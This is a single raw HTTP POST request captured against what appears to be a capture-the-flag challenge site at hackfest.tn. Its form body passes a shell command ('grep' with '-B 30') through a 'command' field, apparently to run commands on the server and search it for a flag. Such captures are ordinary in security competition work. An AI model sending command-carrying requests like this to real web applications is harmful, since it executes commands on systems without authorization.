POST /index.php HTTP/1.1
Host: privatedomainn.locke.challenges.hackfest.tn
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://privatedomainn.locke.challenges.hackfest.tn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://privatedomainn.locke.challenges.hackfest.tn/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

command=grep+black+-B+30

